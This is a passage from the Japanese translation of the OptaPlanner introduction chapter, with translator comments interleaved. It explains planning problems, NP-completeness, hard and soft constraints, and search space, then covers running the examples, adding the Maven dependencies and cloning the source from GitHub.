\u306e\u5185\u90e8\u3067\u306f\u3001\u6700\u9069\u5316\u306e\u305f\u3081\u306e\u30d2\u30e5\u30fc\u30ea\u30b9\u30c6\u30a3\u30c3\u30af\u6cd5\u304a\u3088\u3073\u30e1\u30bf\u30d2\u30e5\u30fc\u30ea\u30b9\u30c6\u30a3\u30c3\u30af\u6cd5\u304c\u975e\u5e38\u306b\u52b9\u7387\u7684\u306a\u30b9\u30b3\u30a2\u8a08\u7b97\u3068\u7d44\u307f\u5408\u308f\u3055\u308c\u3066\u3044\u307e\u3059\u3002\n\n\n\n[[requirements]]\n== 1.2. \u5fc5\u8981\u306a\u3082\u306e\n\nOptaPlanner\u306f\u3001link:http:\/\/www.apache.org\/licenses\/LICENSE-2.0.html[Apache \u30bd\u30d5\u30c8\u30a6\u30a7\u30a2\u30e9\u30a4\u30bb\u30f3\u30b9 2.0]\u306e\u4e0b\u3067\u914d\u5e03\u3055\u308c\u308b _\u30aa\u30fc\u30d7\u30f3\u30bd\u30fc\u30b9\u30fb\u30bd\u30d5\u30c8\u30a6\u30a7\u30a2_ \u3067\u3059\u3002\u3053\u306e\u30e9\u30a4\u30bb\u30f3\u30b9\u306f\u3001\u975e\u5e38\u306b\u9032\u6b69\u7684\u3067\u3001\u5546\u7528\u76ee\u7684\u3067\u306e\u518d\u4f7f\u7528\u3092\u8a31\u53ef\u3057\u3066\u3044\u307e\u3059\u3002link:http:\/\/www.apache.org\/foundation\/license-faq.html#WhatDoesItMEAN[\u4e00\u822c\u5411\u3051\u8aac\u660e]\u306b\u76ee\u3092\u901a\u3057\u3066\u304f\u3060\u3055\u3044\u3002\n\nOptaPlanner \u306f\u3001100% \u7d14\u7c8b\u306b Java(TM) \u3067\u4f5c\u3089\u308c\u3066\u304a\u308a\u3001\u30d0\u30fc\u30b8\u30e7\u30f3 1.6 \u4ee5\u4e0a\u306e\u3059\u3079\u3066\u306e JVM \u4e0a\u3067\u52d5\u4f5c\u3057\u307e\u3059\u3002\u4ed6\u306e Java(TM) \u6280\u8853\u3068\u306exref:integration[\u7d71\u5408\u306f\u975e\u5e38\u306b\u7c21\u5358]\u3067\u3059\u3002OptaPlanner \u306f\u3001xref:useWithMavenGradleEtc[Maven Central Repository]\u3067\u5229\u7528\u3067\u304d\u307e\u3059\u3002\n\n\/\/ image::https:\/\/docs.optaplanner.org\/6.4.0.Final\/optaplanner-docs\/html_single\/images\/Chapter-Planner_introduction\/compatibility.png[] \/\/\nimage:images\/Chapter-Planner_introduction\/compatibility.png[]\n\n\n\n[[whatIsAPlanningProblem]]\n== 1.3. \u8a08\u753b\u554f\u984c\u3068\u306f\uff1f\n\n[[aPlanningProblemIsNPCompleteOrNPHard]]\n=== 1.3.1. 
\u8a08\u753b\u554f\u984c\u306f NP \u5b8c\u5168\u307e\u305f\u306f NP \u56f0\u96e3\n\n\u4e0a\u306b\u6319\u3052\u305f\u30e6\u30fc\u30b9\u30b1\u30fc\u30b9\u306f\u3059\u3079\u3066\u3001_\u304a\u305d\u3089\u304f_ \u3001link:http:\/\/en.wikipedia.org\/wiki\/NP-complete[NP \u5b8c\u5168]\u3082\u3057\u304f\u306f\u305d\u308c\u3088\u308a\u3082\u56f0\u96e3\u306a\u554f\u984c\u3067\u3059\u3002NP \u5b8c\u5168\u3068\u306f\u3001\u666e\u901a\u306e\u8a00\u8449\u3067\u8868\u73fe\u3059\u308b\u3068\u6b21\u306e\u3088\u3046\u306a\u610f\u5473\u3067\u3059\u3002\n\n* \u554f\u984c\u306e\u89e3\u3092\u3001\u7c21\u5358\u306b\u3001\u9069\u5ea6\u306a\u6642\u9593\u5185\u306b\u691c\u8a3c\u3067\u304d\u308b\u3002\n* \u554f\u984c\u306e\u6700\u9069\u89e3\u3092\u9069\u5ea6\u306a\u6642\u9593\u5185\u306b\u898b\u3064\u3051\u308b\u78ba\u5b9f\u306a\u65b9\u6cd5\u304c\u306a\u3044(*)\u3002\n\n.\u6ce8\u610f\n****\n(*) \u5c11\u306a\u304f\u3068\u3082\u3001\u4e16\u754c\u4e2d\u306e\u982d\u306e\u5207\u308c\u308b\u30b3\u30f3\u30d4\u30e5\u30fc\u30bf\u79d1\u5b66\u8005\u3067\u3055\u3048\u3001\u307e\u3060\u8ab0\u3082\u305d\u306e\u3088\u3046\u306a\u78ba\u5b9f\u306a\u65b9\u6cd5\u3092\u898b\u51fa\u305b\u3066\u3044\u307e\u305b\u3093\u3002\u3057\u304b\u3057\u3001\u8ab0\u304b\u304c 1 \u3064\u306e NP \u5b8c\u5168\u554f\u984c\u306b\u3064\u3044\u3066\u89e3\u3092\u4e00\u3064\u898b\u3064\u3051\u305f\u3068\u3057\u305f\u3089\u3001\u305d\u306e\u89e3\u306f\u3059\u3079\u3066\u306e NP \u5b8c\u5168\u554f\u984c\u306b\u5f53\u3066\u306f\u307e\u308b\u3053\u3068\u306b\u306a\u308a\u307e\u3059\u3002\n\u5b9f\u969b\u3001link:http:\/\/en.wikipedia.org\/wiki\/P_%3D_NP_problem[\u305d\u306e\u3088\u3046\u306a\u78ba\u5b9f\u306a\u65b9\u6cd5\u304c\u5b9f\u5728\u3059\u308b\u304b\u3069\u3046\u304b]\u3092\u8a3c\u660e\u3057\u305f\u4eba\u306b\u306f 100 \u4e07\u30c9\u30eb\u306e\u61f8\u8cde\u91d1\u304c\u4e0e\u3048\u3089\u308c\u308b\u3053\u3068\u306b\u306a\u3063\u3066\u3044\u307e\u3059\u3002\n****\n\n\u3053\u308c\u306f\u5b9f\u306b\u6050\u308d\u3057\u3044\u3053\u3068\u3092\u793a\u5506\u3057\u3066\u3044\u307e\u3059\u3002\u3064\u307e\u308a\u3001\u6b21\u306e 2 \u3064\u306e\u4e00\u822c\u7684\u306a\u65b9\u6cd5\u304c\u529b\u4e0d\u8db3\u3067\u3042\u308b\u305f\u3081\u306b\u3001\u81ea\u5206\u306e\u62b1\u3048\u308b\u554f\u984c\u3092\u89e3\u304f\u306e\u304c\u3001\u304a\u305d\u3089\u304f\u306f\u60f3\u50cf\u4ee5\u4e0a\u306b\u56f0\u96e3\u3060\u3068\u3044\u3046\u3053\u3068\u3067\u3059\u3002\n\n* \u7dcf\u5f53\u305f\u308a\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u306f\u3001\u6642\u9593\u304c\u304b\u304b\u308a\u3059\u304e\u308b\u3002\uff08\u305f\u3068\u3048\u5de7\u5999\u306b\u4f5c\u3063\u305f\u5909\u7a2e\u3067\u3042\u3063\u3066\u3082\u3002\uff09\n* \u901f\u6210\u306e\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u306f\u3001\u4f8b\u3048\u3070\u7bb1\u8a70\u3081\uff08\u30d3\u30f3\u30d1\u30c3\u30ad\u30f3\u30b0\uff09\u306b\u304a\u3044\u3066 _Largest First \u6cd5\u306b\u5f93\u3063\u3066\u7269\u3092\u5165\u308c\u308b_ \u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u306e\u3088\u3046\u306b\u3001\u6700\u9069\u89e3\u304b\u3089\u306f\u307b\u3069\u9060\u3044\u89e3\u3092\u8fd4\u3057\u3066\u3057\u307e\u3046\u3002\n\n*OptaPlanner \u306f\u3001\u5148\u9032\u7684\u306a\u6700\u9069\u5316\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u3092\u4f7f\u7528\u3059\u308b\u3053\u3068\u306b\u3088\u3063\u3066\u3001\u305d\u306e\u3088\u3046\u306a\u8a08\u753b\u554f\u984c\u306b\u5bfe\u3057\u3066\u3001\u9069\u5ea6\u306a\u6642\u9593\u5185\u306b\u826f\u3044\u89e3\u3092\u898b\u3064\u3051\u51fa\u3057\u307e\u3059\u3002*\n\n\n\n[[aPlanningProblemHasConstraints]]\n=== 1.3.2. 
\u8a08\u753b\u554f\u984c\u306b\u306f\u5236\u7d04\u304c\u3042\u308b\uff08\u30cf\u30fc\u30c9, \u30bd\u30d5\u30c8\u5236\u7d04\uff09\n\n\u8a08\u753b\u554f\u984c\u306b\u306f\u3001\u591a\u304f\u306e\u5834\u5408\u3001\u5c11\u306a\u304f\u3068\u3082\u6b21\u306e\u3088\u3046\u306a 2 \u3064\u306e\u6c34\u6e96\u306e\u5236\u7d04\u304c\u3042\u308a\u307e\u3059\u3002\n\n* _\u30cf\u30fc\u30c9\u5236\u7d04 (\u8ca0\u5024)_ \u306f\u3001\u9055\u53cd\u3057\u3066\u306f\u306a\u3089\u306a\u3044\u3002\u4f8b: _1 \u4eba\u306e\u5148\u751f\u304c\u7570\u306a\u308b 2 \u3064\u306e\u6388\u696d\u3067\u540c\u6642\u306b\u6559\u3048\u308b\u3053\u3068\u306f\u3067\u304d\u306a\u3044\u3002_ \n* _\u30bd\u30d5\u30c8\u5236\u7d04 (\u8ca0\u5024)_ \u306f\u3001\u907f\u3051\u3089\u308c\u308b\u9650\u308a\u3001\u9055\u53cd\u3057\u3066\u306f\u306a\u3089\u306a\u3044\u3002\u4f8b: _\u5148\u751f A \u306f\u3001\u91d1\u66dc\u65e5\u306e\u5348\u5f8c\u306b\u6559\u3048\u305f\u304f\u306a\u3044\u3002_ \n\n\u6b21\u306e\u3088\u3046\u306b\u3001\u6b63\u5024\u306e\u5236\u7d04\u3092\u6301\u3064\u554f\u984c\u3082\u3042\u308a\u307e\u3059\u3002\n\n* \u53ef\u80fd\u306a\u9650\u308a\u3001_\u6b63\u5024\u306e\u30bd\u30d5\u30c8\u5236\u7d04 (\u307e\u305f\u306f\u5831\u916c)_ \u304c\u6e80\u8db3\u3055\u308c\u306a\u3051\u308c\u3070\u306a\u3089\u306a\u3044\u3002\u4f8b: _\u5148\u751f B\u306f\u3001\u6708\u66dc\u65e5\u306e\u671d\u306b\u6559\u3048\u305f\u3044\u3002_ \n\n\u57fa\u672c\u7684\u306a\u554f\u984c (\u4f8b\u3048\u3070 N Queens \u554f\u984c) \u306b\u306f\u3001\u30cf\u30fc\u30c9\u5236\u7d04\u306e\u307f\u6301\u3064\u3082\u306e\u304c\u3042\u308a\u307e\u3059\u3002\u30cf\u30fc\u30c9\u5236\u7d04, \u30df\u30c7\u30a3\u30a2\u30e0\u5236\u7d04, \u30bd\u30d5\u30c8\u5236\u7d04\u3068\u3044\u3063\u305f\u3088\u3046\u306b\u30013 \u3064\u4ee5\u4e0a\u306e\u6c34\u6e96\u306e\u5236\u7d04\u3092\u6301\u3064\u554f\u984c\u3082\u3042\u308a\u307e\u3059\u3002\n\n\u3053\u308c\u3089\u306e\u5236\u7d04\u306b\u3088\u3063\u3066\u3001\u5404\u554f\u984c\u306e _\u30b9\u30b3\u30a2\u8a08\u7b97\u65b9\u6cd5_ ( _AKA \u9069\u5408\u5ea6\u95a2\u6570_ ) \u304c\u5b9a\u7fa9\u3055\u308c\u307e\u3059\u3002\u4e00\u3064\u306e\u554f\u984c\u306e\u8907\u6570\u306e\u89e3\u305d\u308c\u305e\u308c\u306b\u30b9\u30b3\u30a2\u3092\u4e0e\u3048\u3001\u89e3\u306e\u512a\u52a3\u3092\u4ed8\u3051\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002*OptaPlanner \u306e\u30b9\u30b3\u30a2\u5236\u7d04\u306f\u3001Java \u30b3\u30fc\u30c9\u306e\u3088\u3046\u306a\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u6307\u5411\u8a00\u8a9e\u307e\u305f\u306f Drools \u30eb\u30fc\u30eb\u306b\u3088\u3063\u3066\u8a18\u8ff0\u3055\u308c\u307e\u3059\u3002* \u305d\u308c\u3089\u306e\u30b3\u30fc\u30c9\u306f\u3001\u7c21\u5358\u3067\u3001\u67d4\u8edf\u6027\u3068\u62e1\u5f35\u6027\u3092\u6709\u3057\u3066\u3044\u307e\u3059\u3002\n\/\/\/\/\n150909 Takugo\nSource: AKA --- plain font\nCorrection assumed: AKA --- italic font\n\/\/\/\/\n\n\n\n[[aPlanningProblemHasAHugeSearchSpace]]\n=== 1.3.3. 
\u8a08\u753b\u554f\u984c\u306f\u5de8\u5927\u306a\u63a2\u7d22\u7a7a\u9593\u3092\u6301\u3064\n\n\u4e00\u3064\u306e\u8a08\u753b\u554f\u984c\u306b\u306f\u591a\u6570\u306e _\u89e3_ \u304c\u5b58\u5728\u3057\u307e\u3059\u3002\u89e3\u306b\u306f\u3044\u304f\u3064\u304b\u306e\u7a2e\u985e\u304c\u3042\u308a\u307e\u3059\u3002\n\n* _\u53ef\u80fd\u89e3_ (_possible solution_) \u306f\u3001\u9055\u53cd\u3059\u308b\u5236\u7d04\u306e\u6570\u3092\u554f\u308f\u305a\u306b\u6319\u3052\u3089\u308c\u308b\u3059\u3079\u3066\u306e\u89e3\u3067\u3059\u3002\u8a08\u753b\u554f\u984c\u306b\u306f\u3001\u81a8\u5927\u306a\u6570\u306e\u53ef\u80fd\u89e3\u3092\u6301\u3064\u50be\u5411\u304c\u3042\u308a\u307e\u3059\u3002\u305d\u306e\u89e3\u306e\u591a\u304f\u306b\u4fa1\u5024\u306f\u3042\u308a\u307e\u305b\u3093\u3002\n\/\/\/\/\n150911 Takugo\nSource: possible solution\nTranslation: \u53ef\u80fd\u89e3\n\u5c02\u9580\u7528\u8a9e\u8981\u78ba\u8a8d\n\/\/\/\/\n* _\u5b9f\u884c\u53ef\u80fd\u89e3_ (_feasible solution_) \u306f\u3001\u30cf\u30fc\u30c9\u5236\u7d04 (\u8ca0\u5024) \u3092\u4e00\u3064\u3082\u9055\u53cd\u3057\u306a\u3044\u89e3\u3067\u3059\u3002\u5b9f\u884c\u53ef\u80fd\u89e3\u306e\u6570\u306f\u3001\u53ef\u80fd\u89e3\u306e\u6570\u3068\u76f8\u95a2\u3092\u6301\u3064\u50be\u5411\u306b\u3042\u308a\u307e\u3059\u3002\u5b9f\u884c\u53ef\u80fd\u89e3\u304c\u5b58\u5728\u3057\u306a\u3044\u5834\u5408\u3082\u3042\u308a\u307e\u3059\u3002\u3059\u3079\u3066\u306e\u5b9f\u884c\u53ef\u80fd\u89e3\u306f\u53ef\u80fd\u89e3\u3067\u3059\u3002\n* _\u6700\u9069\u89e3_ (_optimal solution_) \u306f\u3001\u6700\u9ad8\u30b9\u30b3\u30a2\u3092\u6301\u3064\u89e3\u3067\u3059\u3002\u8a08\u753b\u554f\u984c\u306b\u306f\u30011 \u3064\u304b\u3089\u6570\u500b\u306e\u6700\u9069\u89e3\u3092\u6301\u3064\u50be\u5411\u304c\u3042\u308a\u307e\u3059\u3002\u5b9f\u884c\u53ef\u80fd\u89e3\u304c\u5b58\u5728\u305b\u305a\u3001\u6700\u9069\u89e3\u304c\u5b9f\u884c\u53ef\u80fd\u3067\u306a\u3044\u5834\u5408\u3067\u3042\u3063\u3066\u3082\u3001\u5c11\u306a\u304f\u3068\u3082 1 \u3064\u306e\u6700\u9069\u89e3\u306f\u5fc5\u305a\u5b58\u5728\u3057\u307e\u3059\u3002\n* _\u6700\u5584\u89e3_ (_best solution found_) \u306f\u3001\u4e0e\u3048\u3089\u308c\u305f\u6642\u9593\u5185\u3067\u306e\u5b9f\u884c\u7d50\u679c\u306b\u898b\u51fa\u3055\u308c\u308b\u3001\u6700\u9ad8\u30b9\u30b3\u30a2\u3092\u6301\u3064\u89e3\u3067\u3059\u3002\u898b\u51fa\u3055\u308c\u305f\u6700\u5584\u89e3\u306f\u3001\u5b9f\u884c\u53ef\u80fd\u3067\u3042\u308b\u5834\u5408\u304c\u591a\u304f\u3001\u6642\u9593\u304c\u5341\u5206\u306b\u4e0e\u3048\u3089\u308c\u308b\u5834\u5408\u306b\u306f\u6700\u9069\u89e3\u3068\u306a\u308a\u307e\u3059\u3002\n\u53ef\u80fd\u89e3\u306e\u6570\u306f\u3001(\u3082\u3057\u3082\u6b63\u78ba\u306b\u8a08\u7b97\u3059\u308b\u3068\u3057\u305f\u3089\u3001) \u305f\u3068\u3048\u30c7\u30fc\u30bf\u30bb\u30c3\u30c8\u304c\u5c0f\u3055\u304f\u3068\u3082\u3001\u76f4\u611f\u306b\u53cd\u3057\u3066\u81a8\u5927\u306b\u306a\u308a\u307e\u3059\u3002\u30b5\u30f3\u30d7\u30eb\u3067\u78ba\u8a8d\u3067\u304d\u308b\u3088\u3046\u306b\u3001\u307b\u3068\u3093\u3069\u306e\u30b1\u30fc\u30b9\u3067\u3001\u65e2\u77e5\u306e\u5b87\u5b99\u306b\u5b58\u5728\u3059\u308b\u539f\u5b50\u306e\u6570\u306e\u6700\u5c0f\u5024 (10^80^) 
\u3088\u308a\u3082\u305a\u3063\u3068\u591a\u304f\u306e\u53ef\u80fd\u89e3\u304c\u3042\u308a\u307e\u3059\u3002\u305d\u306e\u6700\u9069\u89e3\u3092\u78ba\u5b9f\u306b\u898b\u3064\u3051\u3089\u308c\u308b\u65b9\u6cd5\u304c\u5b58\u5728\u3057\u306a\u3044\u305f\u3081\u3001\u3044\u304b\u306a\u308b\u5b9f\u884c\u65b9\u6cd5\u3082\u3001\u305d\u306e\u3059\u3079\u3066\u306e\u53ef\u80fd\u89e3\u306e\u90e8\u5206\u96c6\u5408\u3060\u3051\u3092\u8a55\u4fa1\u3059\u308b\u3053\u3068\u3057\u304b\u3067\u304d\u307e\u305b\u3093\u3002\n\nOptaPlanner \u306f\u3001\u8907\u6570\u306e\u6700\u9069\u5316\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u3092\u5099\u3048\u3066\u304a\u308a\u3001\u305d\u306e\u3088\u3046\u306a\u81a8\u5927\u306a\u6570\u306e\u53ef\u80fd\u89e3\u3092\u52b9\u7387\u7684\u306b\u51e6\u7406\u3057\u307e\u3059\u3002\u30e6\u30fc\u30b9\u30b1\u30fc\u30b9\u6b21\u7b2c\u3067\u3001\u3042\u308b\u6700\u9069\u5316\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u304c\u4ed6\u306e\u3082\u306e\u3088\u308a\u3082\u826f\u597d\u306a\u6027\u80fd\u3092\u793a\u3059\u3053\u3068\u304c\u3042\u308a\u307e\u3059\u304c\u3001\u305d\u306e\u3053\u3068\u3092\u4e8b\u524d\u306b\u77e5\u308b\u3053\u3068\u306f\u4e0d\u53ef\u80fd\u3067\u3059\u3002*OptaPlanner \u306a\u3089\u3001\u6700\u9069\u5316\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u3092\u7c21\u5358\u306b\u5207\u308a\u63db\u3048\u3089\u308c\u307e\u3059\u3002* XML \u307e\u305f\u306f\u30b3\u30fc\u30c9\u306e\u4e2d\u306e\u30bd\u30eb\u30d0\u8a2d\u5b9a\u3092\u6570\u884c\u66f8\u304d\u66ff\u3048\u308b\u3060\u3051\u3067\u3059\u3002\n\n\n\n[[downloadAndRunTheExamples]]\n== 1.4. \u30b5\u30f3\u30d7\u30eb\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3068\u5b9f\u884c\n\n[[getTheReleaseZipAndRunTheExamples]]\n=== 1.4.1. \u516c\u958b .zip \u306e\u5165\u624b\u3068\u30b5\u30f3\u30d7\u30eb\u306e\u5b9f\u884c\n\n\u4eca\u3059\u3050\u3084\u3063\u3066\u307f\u307e\u3057\u3087\u3046\u3002\n\n{empty}1. link:https:\/\/www.optaplanner.org\/[OptaPlanner \u30a6\u30a7\u30d6\u30b5\u30a4\u30c8]\u304b\u3089 OptaPlanner \u306e\u516c\u958b .zip \u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u307e\u3059\u3002\n\n{empty}2. \u89e3\u51cd\u3057\u307e\u3059\u3002\n\n{empty}3. 
+*examples*+ \u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u3092\u958b\u304d\u3001\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002\n\nLinux \u307e\u305f\u306f Mac:\n\n\/\/ [source] \/\/\n----\n$ cd examples\n$ .\/runExamples.sh\n----\n\nWindows:\n\n\/\/ [source] \/\/\n----\n$ cd examples\n$ runExamples.bat\n----\n\n\/\/ image::https:\/\/docs.optaplanner.org\/6.4.0.Final\/optaplanner-docs\/html_single\/images\/Chapter-Planner_introduction\/distributionZip.png[] \/\/\nimage:https:\/\/docs.optaplanner.org\/6.4.0.Final\/optaplanner-docs\/html_single\/images\/Chapter-Planner_introduction\/distributionZip.png[]\n\n\u30b5\u30f3\u30d7\u30eb GUI \u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u304c\u958b\u304d\u307e\u3059\u3002\u30b5\u30f3\u30d7\u30eb\u3092\u4e00\u3064\u9078\u629e\u3057\u3066\u304f\u3060\u3055\u3044\u3002\n\nimage::https:\/\/docs.optaplanner.org\/6.4.0.Final\/optaplanner-docs\/html_single\/images\/Chapter-Planner_introduction\/plannerExamplesAppScreenshot.png[]\n\n\n.\u6ce8\u610f\n****\nOptaPlanner \u81ea\u4f53\u306f GUI \u306b\u5bfe\u3057\u3066\u4f9d\u5b58\u6027\u3092\u6301\u3061\u307e\u305b\u3093\u3002OptaPlanner \u306f\u3001\u30c7\u30b9\u30af\u30c8\u30c3\u30d7\u4e0a\u3068\u307e\u3063\u305f\u304f\u540c\u69d8\u306b\u3001\u30b5\u30fc\u30d0\u3084\u30e2\u30d0\u30a4\u30eb JVM \u4e0a\u3067\u3082\u52d5\u4f5c\u3057\u307e\u3059\u3002\n****\n\n\n\n[[runTheExamplesInAnIDE]]\n=== 1.4.2. IDE (IntelliJ, Eclipse, NetBeans) \u3067\u306e\u30b5\u30f3\u30d7\u30eb\u306e\u5b9f\u884c\n\n\u81ea\u5206\u306e\u597d\u307f\u306e IDE \u3067\u30b5\u30f3\u30d7\u30eb\u3092\u5b9f\u884c\u3059\u308b\u306b\u306f\u6b21\u306e\u3088\u3046\u306b\u3057\u307e\u3059\u3002\n\n{empty}1. IDE \u3092\u8a2d\u5b9a\u3057\u307e\u3059\u3002\n* IntelliJ IDEA \u3068 NetBeans \u3067\u306f\u3001+*examples\/sources\/pom.xml*+ \u3092\u65b0\u3057\u3044\u30d7\u30ed\u30b8\u30a7\u30af\u30c8\u3068\u3057\u3066\u958b\u304d\u307e\u3059\u3002\u305d\u3046\u3059\u308b\u3060\u3051\u3067\u3001\u6b8b\u308a\u306f Maven \u304c\u7d71\u5408\u3057\u3066\u304f\u308c\u307e\u3059\u3002\n* Eclipse \u3067\u306f\u3001\u30c7\u30a3\u30ec\u30af\u30c8\u30ea +*examples\/sources*+ \u306b\u3064\u3044\u3066\u65b0\u3057\u3044\u30d7\u30ed\u30b8\u30a7\u30af\u30c8\u3092\u958b\u304d\u307e\u3059\u3002\n** \u30d5\u30a1\u30a4\u30eb +*examples\/binaries\/optaplanner-examples-_version_.jar*+ \u3092\u9664\u304f\u3001\u30c7\u30a3\u30ec\u30af\u30c8\u30ea +*binaries*+ \u304a\u3088\u3073 +*examples\/binaries*+ \u306b\u542b\u307e\u308c\u308b\u3059\u3079\u3066\u306e jar \u3092\u30af\u30e9\u30b9\u30d1\u30b9\u306b\u8ffd\u52a0\u3057\u307e\u3059\u3002\n** Java \u30bd\u30fc\u30b9\u30c7\u30a3\u30ec\u30af\u30c8\u30ea +*src\/main\/java*+ \u3068 Java \u30ea\u30bd\u30fc\u30b9\u30c7\u30a3\u30ec\u30af\u30c8\u30ea +*src\/main\/resources*+ \u3092\u8ffd\u52a0\u3057\u307e\u3059\u3002\n\/\/\/\/\n150911 Takugo\nSource: \nAdd all the jars to the classpath from the directory binaries and the directory examples\/binaries\nInterpreted as: \nAdd all the jars in the directories binaries and examples\/binaries to the classpath\n\/\/\/\/\n\n{empty}2. Run \u8a2d\u5b9a\u3092\u4f5c\u6210\u3057\u307e\u3059\u3002\n* \u30e1\u30a4\u30f3\u30af\u30e9\u30b9: +org.optaplanner.examples.app.OptaPlannerExamplesApp+\n* VM \u30d1\u30e9\u30e1\u30fc\u30bf (\u30aa\u30d7\u30b7\u30e7\u30f3): +-Xmx512M -server+\n\n{empty}3. \u3053\u306e Run \u8a2d\u5b9a\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002\n\n\n\n[[useWithMavenGradleEtc]]\n=== 1.4.3. 
OptaPlanner \u3092 Maven \u3084 Gradle, Ivy, Buildr, ANT \u3068\u3068\u3082\u306b\u4f7f\u3046\n\nOptaPlanner \u306e jar \u306f\u3001link:http:\/\/search.maven.org\/#search|ga|1|org.optaplanner[Maven Central Repository] \u3067\u3082\u5229\u7528\u3067\u304d\u307e\u3059\u3002\uff08link:https:\/\/repository.jboss.org\/nexus\/index.html#nexus-search;gav~org.optaplanner~~~~[JBoss Maven Repository] \u3067\u3082\u5229\u7528\u3067\u304d\u307e\u3059\u3002\uff09\n\/\/\/\/\n150914 Takugo\nSource: central maven repository\nTranslated: Maven Central Repository\n\/\/\/\/\n\nMaven \u3092\u4f7f\u3046\u5834\u5408\u306f\u3001\u4ee5\u4e0b\u306e\u3088\u3046\u306b\u3001\u30d7\u30ed\u30b8\u30a7\u30af\u30c8\u306e +*pom.xml*+ \u3067 +optaplanner-core+ \u306b\u4f9d\u5b58\u6027\u3092\u8ffd\u52a0\u3057\u3066\u304f\u3060\u3055\u3044\u3002\n\n----\n <dependency>\n <groupId>org.optaplanner<\/groupId>\n <artifactId>optaplanner-core<\/artifactId>\n <\/dependency>\n----\n\n\u3053\u308c\u306f\u3001Gradle, Ivy, Buildr \u306b\u3064\u3044\u3066\u3082\u540c\u69d8\u3067\u3059\u3002\u6700\u65b0\u7248\u306f\u3001link:http:\/\/search.maven.org\/#search|ga|1|org.optaplanner[Maven Central Repository] \u3067\u78ba\u8a8d\u3057\u3066\u304f\u3060\u3055\u3044\u3002\n\n\u4ed6\u306e OptaPlanner \u30e2\u30b8\u30e5\u30fc\u30eb\u3082\u4f7f\u7528\u3059\u308b\u3053\u3068\u306b\u306a\u308b\u53ef\u80fd\u6027\u304c\u3042\u308b\u305f\u3081\u3001\u4ee5\u4e0b\u306e\u3088\u3046\u306b\u3001Maven \u306e +dependencyManagement+ \u3067 +optaplanner-bom+ \u3092\u30a4\u30f3\u30dd\u30fc\u30c8\u3059\u308b\u3053\u3068\u3092\u63a8\u5968\u3057\u307e\u3059\u3002\u3053\u3046\u3057\u3066\u304a\u304f\u3068\u3001OptaPlanner \u306e\u30d0\u30fc\u30b8\u30e7\u30f3\u6307\u5b9a\u306f\u4e00\u56de\u3060\u3051\u3067\u6e08\u307f\u307e\u3059\u3002\n\n----\n <dependencyManagement>\n <dependencies>\n <dependency>\n <groupId>org.optaplanner<\/groupId>\n <artifactId>optaplanner-bom<\/artifactId>\n <type>pom<\/type>\n <version>...<\/version>\n <scope>import<\/scope>\n <\/dependency>\n ...\n <\/dependencies>\n <\/dependencyManagement>\n----\n\n\u307e\u3060 (Ivy \u306a\u3057\u3067) ANT \u3092\u4f7f\u7528\u3057\u3066\u3044\u308b\u5834\u5408\u306f\u3001\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u305f zip \u5185\u306e\u30c7\u30a3\u30ec\u30af\u30c8\u30ea +*binaries*+ \u306b\u3042\u308b\u3059\u3079\u3066\u306e jar \u3092\u81ea\u5206\u306e\u30af\u30e9\u30b9\u30d1\u30b9\u306b\u30b3\u30d4\u30fc\u3057\u307e\u3059\u3002\n\/\/\/\/\n150914 Takugo\nSource: copy ... in your class path\nInterpreted as: copy ... 
to your class path\n\/\/\/\/\n\n.\u6ce8\u610f\n****\n\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u305f zip \u5185\u306e\u30c7\u30a3\u30ec\u30af\u30c8\u30ea +*binaries*+ \u306b\u306f\u3001+optaplanner-core+ \u304c\u5b9f\u969b\u306b\u4f7f\u7528\u3059\u308b\u3088\u308a\u3082\u306f\u308b\u304b\u306b\u591a\u304f\u306e jar \u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002+optaplanner-benchmark+ \u306a\u3069\u4ed6\u306e\u30e2\u30b8\u30e5\u30fc\u30eb\u304c\u4f7f\u7528\u3059\u308b jar \u3082\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\n\/\/\/\/\n150914 Takugo\nSource: far more jars then\nCorrected: far more jars than\n\/\/\/\/\n\nMaven \u30ea\u30dd\u30b8\u30c8\u30ea\u306e +*pom.xml*+ \u30d5\u30a1\u30a4\u30eb\u3092\u78ba\u8a8d\u3057\u3001(\u7279\u5b9a\u306e\u30d0\u30fc\u30b8\u30e7\u30f3\u306e\u305f\u3081\u306e) \u7279\u5b9a\u306e\u30e2\u30b8\u30e5\u30fc\u30eb\u306b\u3064\u3044\u3066\u3001\u6700\u5c0f\u306e\u4f9d\u5b58\u6027\u30bb\u30c3\u30c8\u3092\u6c7a\u3081\u3066\u304f\u3060\u3055\u3044\u3002\n****\n\n\n\n[[buildFromSource]]\n=== 1.4.4. OptaPlanner \u3092\u30bd\u30fc\u30b9\u304b\u3089\u30d3\u30eb\u30c9\u3059\u308b\n\nOptaPlanner \u3092\u30bd\u30fc\u30b9\u304b\u3089\u30d3\u30eb\u30c9\u3059\u308b\u306e\u306f\u7c21\u5358\u3067\u3059\u3002\n\n{empty}1. link:https:\/\/help.github.com\/articles\/set-up-git\/[Git \u3092\u8a2d\u5b9a]\u3057\u3001GitHub \u304b\u3089\u306e +clone optaplanner+ \u3092\u5b9f\u884c\u3057\u307e\u3059\u3002(\u307e\u305f\u306f\u3001link:https:\/\/github.com\/droolsjbpm\/optaplanner\/zipball\/master[zipball] \u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u307e\u3059\u3002)\n\n----\n$ git clone git@github.com:droolsjbpm\/optaplanner.git optaplanner\n...\n----\n\n.\u6ce8\u610f\n****\nGitHub 